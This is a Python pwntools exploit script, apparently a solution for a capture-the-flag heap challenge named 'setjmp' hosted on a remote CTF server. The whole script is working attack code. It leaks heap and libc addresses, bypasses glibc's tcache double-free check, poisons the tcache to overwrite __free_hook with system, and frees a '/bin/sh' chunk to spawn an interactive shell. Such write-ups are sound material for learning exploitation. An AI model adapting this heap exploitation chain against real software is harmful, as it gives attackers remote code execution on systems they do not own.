#!/usr/bin/python3
from pwn import *

# You need to patch the run file with the correct version of libc first.
# pwninit will create a file named run_patched if you run it in a directory that contains one executable and the libc binary that you need.
process_name = "./run_patched"
libc_name = "./libc.so.6"

context.terminal = ["tmux", "splitw", "-h"]

# p = process(process_name)
p = remote("setjmp.chal.hitconctf.com", 1337)
elf = ELF(process_name)
libc = ELF(libc_name)

def restart():
    p.sendlineafter(b"> ", b"1")

def create_user_clean(username, password):
    p.sendlineafter(b"> ", b"2")
    p.sendafter(b"username > ", username)
    p.sendafter(b"password > ", password)

def create_user_clean_pwd(username, password):
    p.sendlineafter(b"> ", b"2")
    p.sendlineafter(b"username > ", username)
    p.sendafter(b"password > ", password)

def create_user(username, password):
    p.sendlineafter(b"> ", b"2")
    p.sendlineafter(b"username > ", username)
    p.sendlineafter(b"password > ", password)

def del_user(username: str):
    p.sendlineafter(b"> ", b"3")
    p.sendlineafter(b"username > ", username)

def change_pass(username: str, new_password):
    p.sendlineafter(b"> ", b"4")
    p.sendlineafter(b"username > ", username)
    p.sendlineafter(b"password > ", new_password)

def view_users():
    p.sendlineafter(b"> ", b"5")

def trigger_consolidate(pattern: str, n: int):
    input(f"sending big input: {b'5 ' +pattern*n}")
    p.sendafter(b"> ", b"5 " + pattern*n)

def exit():
    p.sendlineafter(b"> ", b"6")

# 1. get heap leak
del_user(b"root")
view_users()
p.recvuntil(b": ")
heap_leak = unpack(p.recvline().strip(), "all")
print(f"heap base {heap_leak=:#x}")

create_user(b"root", b"root") # restore root user and list

# 2. libc leak
# Put some chunks into the fastbin, trigger a scanf on a big input to call malloc_consolidate()
for i in range(30):
    create_user(f"test{i}", b"michel")

for i in range(30):
    del_user(f"test{i}")

restart()

trigger = "0"*0x500

p.sendlineafter(b"> ", trigger)

# exhaust tcache bins
for i in range(5):
    create_user(f"trash{i}", b"useless")

# allocate straight from unsorted bin
create_user(b"", b"")
view_users()

leak2 = p.recvuntil(b":").strip(b":").replace(b"\x0a", b"\xe0")
libc.address = unpack(leak2, "all") - 0x1ecbe0
print(f"{libc.address=:#x}")

# 3. Perform double free with tcache poisoning.
# For this, we need to have one chunk in the user list, free it once, modify its password to modify the tcache key and prevent the double free detection. Then we can get an arbitrary chunk.

restart() # start again with a sane list.
# create and delete a user so we have one element in the tcache already. List head will then be at root
view_users()
print("[+] About to delete new root user")

# Update the tcache count before the double free
create_user(f"fill", b"fill")
del_user(f"fill")

print("[*] About to delete root user")
del_user(b"root")
print(f"[*] root user's new username: {heap_leak+0xa20:#x}")
print("[+] deleted root user, about to attempt change pass. We need to know the new username of root, which is a heap address bc its in the tcache")
# change_pass(b"\x00"*8, b"A")
p.sendlineafter(b"> ", b"4")
p.recvuntil(b"username > ")
p.send(p64(heap_leak + 0xa20))
p.recvuntil(b"password > ")
p.sendline(b"A") # We do this to avoid double free detection with chunk->key

del_user(p64(heap_leak + 0xa20))

# Now we have a double free in the tcache. We want to allocate a new user and set its username to whatever address we want our next chunk to be in. Then we alloc a new user and write to that address.
print("[+] about to create a new user, this will poison the tcache")
create_user_clean(p64(libc.symbols["__free_hook"]), b"A")

# Consume one element in the tcache, this chunk will point to the old root user again.
create_user(b"no_need", b"filler")
print("[+] About to create new user to write into __free_hook")
create_user_clean(p64(libc.symbols["system"]), b"A")

print("[+] about to create user /bin/sh")
create_user(b"/bin/sh", b"michel")
print("[+] about to delete user /bin/sh")
del_user(b"/bin/sh")

p.interactive()
